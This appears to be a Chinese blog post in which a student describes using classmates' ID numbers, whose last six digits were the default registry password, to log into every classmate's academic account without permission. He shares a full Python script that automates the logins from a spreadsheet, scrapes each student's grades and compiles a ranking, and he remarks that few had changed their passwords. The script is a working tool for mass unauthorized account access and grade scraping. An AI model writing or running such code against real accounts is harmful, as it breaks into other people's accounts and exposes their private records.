刚开学时班长发了每个人的身份证号码,被别有用心的boy存到了本地。教务处密码是身份证后六位,然后我就悄悄地(偷偷地)制作了一张均分排名(⊙v⊙)。
过程中学习了模拟登录以及正则表达式的基本应用。本来是用 urllib 库的,结果遇到 302 重定向问题,不会提取响应报文,于是改用第三方库 requests(顺便解决了编码问题)。另外还加入了第三方库 xlrd,用来读取本地的 Excel 文件。
代码如下:
# -*- coding: utf-8 -*-
"""Download per-student grade pages and record a credit-weighted average.

For every row of a local spreadsheet the script logs in to the registry
site, fetches the grade page, writes the parsed course rows to a per-student
text file and appends the student's weighted average to ``allmarks.txt``.

NOTE: only run this against accounts you are authorised to access.
"""
import re

change_sum = 0  # number of students for whom no course row could be parsed
grade_course = ['*************']  # course names that count toward the average

# Marker that opens every grade row in the downloaded page.
_ROW_MARKER = '''<tr class="odd" onMouseOut="this.className='even';" onMouseOver="this.className='evenfocus';">'''

# Whitespace-delimited tokens that do not start with '<' or '|'.
# NOTE(review): the listing this was recovered from showed a literal ``s``
# where ``\s`` is presumably intended (backslash escapes appear to have been
# lost in transit) -- confirm against a real grade page.
_FIELD_RE = re.compile(r'(?<=\s)[^<|\s][^>]*?(?=\s)')


class course():
    '''One parsed grade row; L is the list of fields taken from that row.'''
    def __init__(self, L):
        self.name = L[2]    # course name
        self.credit = L[3]  # course credit
        self.grade = L[8]   # course score
        self.rank = L[9]    # course rank


class person():
    '''A student together with the credit-weighted average of their grades.'''
    def __init__(self, name, S):
        '''
        name -- label stored on the instance.
        S    -- dict mapping course name to a `course` object.

        Only courses whose name is listed in the module-level `grade_course`
        and whose grade and credit both parse as numbers are averaged.
        `average` is 0.0 when no course qualifies (previously this raised
        ZeroDivisionError).
        '''
        self.name = name
        self.courses = S
        weighted_sum = 0.0
        credit_sum = 0.0
        for key, value in S.items():
            if key not in grade_course:
                continue
            try:
                score = float(value.grade)
                credit = float(value.credit)
            except (TypeError, ValueError):
                # Non-numeric grade or credit: leave the course out entirely.
                continue
            credit_sum += credit
            weighted_sum += score * credit
        self.average = weighted_sum / credit_sum if credit_sum else 0.0


def save(Path, Data):
    '''Append the string Data to the file at Path.'''
    with open(Path, 'a') as file_obj:
        file_obj.write(Data)


def _hidden_field(data, field):
    '''Return the value attribute of the input named `field` in `data`.

    Raises IndexError when the page contains no such input.
    '''
    found = re.search('(?<=name="%s" value=").+?(?=")' % re.escape(field), data)
    if found is None:
        raise IndexError('hidden field %r not found in login page' % field)
    return found.group(0)


def gettext(username, password):
    '''Log in with username/password and return the grade page text.

    Returns '' when the login POST does not answer with status 200.
    Raises IndexError when the login page lacks the hidden `lt` or
    `execution` fields.
    '''
    import requests

    header = {  # browser-like request headers
        'Connection' : 'Keep-Alive',
        'Accept-Language' : 'zh-CN',
        'Accept' : 'image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*',
        'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2; Tablet PC 2.0; GWX:DOWNLOADED; GWX:RESERVED; GWX:QUALIFIED; SMJB)',
        'Accept-Encoding' : 'gzip, deflate',
        'Host' : '*********',
        'DNT': '1'
    }

    url = '**********'  # login URL of the registry site
    s = requests.session()  # the session keeps cookies between requests
    r = s.get(url, headers=header)

    payload = {  # login form fields, including the two hidden ones
        'username' : username,
        'password': password,
        'submit' : '',
        'lt' : _hidden_field(r.text, 'lt'),
        'execution' : _hidden_field(r.text, 'execution'),
        '_eventId' : 'submit',
        'rmShown' : '1'
    }

    login = s.post(url, data=payload, headers=header)

    if login.status_code != 200:
        # The original concatenated str + int here and raised TypeError.
        print('%s login failed, login.status_code:%s' % (username, login.status_code))
        return ''

    # The original printed a global `name` that is not a parameter of this
    # function; `username` is the identity this function is actually given.
    print('%s login success!' % username)
    # The response of this first request is discarded.
    # NOTE(review): presumably it is needed to set up the session -- confirm.
    s.get('**************', headers=header)
    preurl = '**************'
    dox = '************'  # location of the grade page
    newurl = preurl + dox
    return s.get(newurl, headers=header).text


def _course_rows(text):
    '''Yield one list of exactly 10 fields per well-formed grade row in text.'''
    # Everything before the first row marker is page preamble, not a row.
    for chunk in text.split(_ROW_MARKER)[1:]:
        fields = _FIELD_RE.findall(chunk)
        if len(fields) < 10:
            print('Error : wrong course')
            continue
        # Surplus tokens are dropped starting at index 3 so that the last
        # seven fields keep their positions.
        del fields[3:len(fields) - 7]
        yield fields


def textanal(name, text):
    '''Parse the grade page `text` of student `name` and save the results.

    Each parsed row is appended to the student's own file and the weighted
    average is appended to allmarks.txt. When no row can be parsed the
    module-level counter `change_sum` is incremented instead. An empty
    `text` is ignored.
    '''
    # NOTE(review): the original indentation was lost; the `else` that counts
    # a failure is assumed to pair with `if courses`, not with `if text`.
    if not text:
        return

    prepath = '***********'  # directory prefix for the output files
    path = prepath + name + '.txt'

    courses = {}
    for fields in _course_rows(text):
        # NOTE(review): the ' ' separators below may originally have been
        # tab/newline escapes; kept exactly as found.
        save(path, ' '.join(fields) + ' ')
        courses[fields[2]] = course(fields)

    if courses:
        one = person(name, courses)
        # Record this student's average.
        save(prepath + 'allmarks.txt', name + ' ' + str(one.average) + ' ')
    else:
        global change_sum
        change_sum += 1
        print('%s password changed or exist verification code!' % name)


def main():
    '''Process every row of the spreadsheet and print the failure count.'''
    import xlrd

    # Read each student's name, username and password source from the sheet.
    book = xlrd.open_workbook('************')
    sheet = book.sheet_by_index(0)
    for x in range(sheet.nrows):
        row = sheet.row_values(x)
        name = row[5]
        username = row[2]
        password = row[15][-6:]  # last six characters of column 15
        textanal(name, gettext(username, password))
    print(change_sum)  # number of students without any parsed course


if __name__ == '__main__':
    main()
最后用excel处理下数据就好啦!
然而最后发现修改了密码的人好少= =只有个位数